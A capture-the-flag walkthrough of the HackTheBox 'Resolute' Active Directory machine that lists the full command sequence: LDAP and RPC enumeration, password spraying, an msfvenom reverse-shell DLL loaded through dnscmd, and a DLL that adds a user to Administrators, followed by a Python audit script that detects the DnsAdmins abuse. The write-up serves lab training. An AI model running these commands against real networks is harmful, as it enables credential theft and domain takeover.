RESOLUTE – HACKTHEBOX

This is the Write-up/Walkthrough of the RESOLUTE Machine from Hackthebox.

NMAP SCAN:

88/tcp   open  kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2023-08-09 13:09:28Z)
135/tcp  open  msrpc        syn-ack Microsoft Windows RPC
139/tcp  open  netbios-ssn  syn-ack Microsoft Windows netbios-ssn
389/tcp  open  ldap         syn-ack Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp  open               syn-ack Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp  open  kpasswd5?    syn-ack
593/tcp  open  ncacn_http   syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped   syn-ack
3268/tcp open  ldap         syn-ack Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped   syn-ack

Domain found: megabank.local, NetBIOS name: Resolute

No file shares were accessible over SMB, so I used ldapsearch to pull more information about the domain, redirected the output to a file, and extracted all the usernames from it.

ldapsearch -x -H ldap://10.10.10.169 -D '' -w '' -b "DC=megabank,DC=local" > ldap_search   # -x: simple (anonymous) bind instead of SASL
cat ldap_search | grep sAMAccountName | awk '{print $2}' > users.txt
# the list also contains group names (the first entries); remove those from users.txt by hand

After that I used rpcclient to enumerate the domain further. The querydispinfo command showed a password set for the marko account, “Welcome123!”, so I then tried this password against every user account I had found.

rpcclient -U "" -N 10.10.10.169
rpcclient $> querydispinfo

After that I used hydra to try that password against all the users over SMB, and it turned out to be valid for the melanie user.

hydra -L users.txt -p 'Welcome123!' smb://10.10.10.169

The same username and password also work for the WinRM service; I confirmed this by spraying with crackmapexec:

crackmapexec winrm 10.10.10.169 -u users.txt -p 'Welcome123!'

Logged in with evil-winrm and got the user flag.

While enumerating I found a hidden directory in C:\ named PSTranscripts. Going deeper into it, I found a file containing a PowerShell transcript, and reading it revealed the password of the ryan user.

After connecting as ryan with evil-winrm, I found that the user is in the Contractors group and that this group is a member of DnsAdmins. Searching for DnsAdmins abuse on the Internet turned up a technique: a DnsAdmins member can use dnscmd to register a malicious DLL as a server-level plugin, and stopping and starting the DNS service makes it load that DLL, which gives a reverse shell.

Ryan is a member of the Contractors group.

Checking the local groups, I found a DnsAdmins group; checking its members showed that the Contractors group is a member of it, so ryan is effectively in DnsAdmins.

I followed this blog to get the Administrator account (Domain Admin); read the blog for more info.

I will show two methods for getting an Administrator account: the first gets a shell directly, and the second modifies the user account (or changes the administrator password) directly.

Note: In a real-world environment, it is not advisable to change the credentials of any user.

Method 1:

Generate a malicious DLL with msfvenom to get the reverse shell:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.48 LPORT=1337 -f dll -o h311.dll

After that, start an SMB server with impacket in the directory where the generated DLL is:

impacket-smbserver -smb2support share .

On the target, as ryan, use dnscmd to point the DNS server at the generated DLL:

dnscmd /config /serverlevelplugindll \\YOUR-TUNNEL-IP\share\h311.dll

Start Metasploit listener:

msfconsole -q
msf6> use multi/handler
msf6> set payload windows/x64/meterpreter/reverse_tcp
msf6> set lhost tun0
msf6> set lport 1337
msf6> run
#now wait for the connection 

After that, stop the DNS service and start it again; make sure the Metasploit listener is already running.

sc.exe stop dns
sc.exe start dns

Method 2:

Generate the payload with msfvenom, but this time embed the command to run directly in it:

msfvenom -p windows/x64/exec cmd='net localgroup Administrators ryan /add /domain' -f dll -o h311_add.dll

After that, start an SMB server with impacket in the directory where the generated DLL is:

impacket-smbserver -smb2support share .

On the target, as ryan, use dnscmd to point the DNS server at the generated DLL:

dnscmd /config /serverlevelplugindll \\YOUR-TUNNEL-IP\share\h311_add.dll

After that, stop the DNS service and start it again (no Metasploit listener is needed for this method, since the payload runs the command directly).

sc.exe stop dns
sc.exe start dns

Now I can check that ryan is in the Administrators group.
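For the defensive side of the path used above (the nested Contractors -> DnsAdmins membership, and the dnscmd /config /serverlevelplugindll step), here is an added Python audit example. It is not part of the original writeup; the group map and the process command lines it checks are constructed samples in the style of net group output and Sysmon/4688 records, not data captured from the box.

```python
import re

# Constructed sample of group membership in the shape `net group` / `net localgroup`
# would list it (not real output from the box): DnsAdmins holds the Contractors
# group, and Contractors holds ryan.
SAMPLE_GROUPS = {
    "DnsAdmins": ["Contractors"],
    "Contractors": ["ryan"],
    "Domain Admins": ["Administrator"],
}

def effective_members(group, groups, _seen=None):
    """Expand nested groups so indirect members (ryan via Contractors) are reported."""
    _seen = set() if _seen is None else _seen
    members = set()
    for m in groups.get(group, []):
        if m in groups:                     # m is itself a group: recurse (cycle-safe)
            if m not in _seen:
                _seen.add(m)
                members |= effective_members(m, groups, _seen)
        else:
            members.add(m)
    return members

# Constructed process command lines in the style of Sysmon EID 1 / Security 4688 records.
SAMPLE_CMDLINES = [
    r"dnscmd /config /serverlevelplugindll \\10.10.14.48\share\h311.dll",
    r"sc.exe stop dns",
    r"dnscmd.exe /zoneprint megabank.local",
]

PLUGIN_RE = re.compile(r"dnscmd(\.exe)?\b.*?/config\s+/serverlevelplugindll\s+(\S+)", re.I)

def plugin_dll_finding(cmdline):
    """Rate a ServerLevelPluginDll change: the DNS service loads this DLL on restart."""
    m = PLUGIN_RE.search(cmdline)
    if not m:
        return None
    path = m.group(2)
    if path.startswith("\\\\"):
        return "critical: plugin DLL loaded from a remote share: " + path
    if not path.lower().startswith("c:\\windows\\system32\\"):
        return "high: plugin DLL outside System32: " + path
    return "medium: plugin DLL changed to " + path

def audit(groups, cmdlines):
    """Combine both checks into a list of findings for review."""
    findings = ["DnsAdmins effective member: " + u
                for u in sorted(effective_members("DnsAdmins", groups))]
    findings += [f for f in map(plugin_dll_finding, cmdlines) if f]
    return findings
```

Pair the command-line check with a periodic read of the ServerLevelPluginDll value under the DNS service's Parameters key, since a change made with dnscmd is only visible once, but the registry value persists until removed.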

But in this lab there is a note.txt on ryan's Desktop saying that any changes to the administrator account are reverted within 1 minute. There are also many other ways to get an administrator account using these methods; try some on your own.

If you face any problems, let me know in the comment.
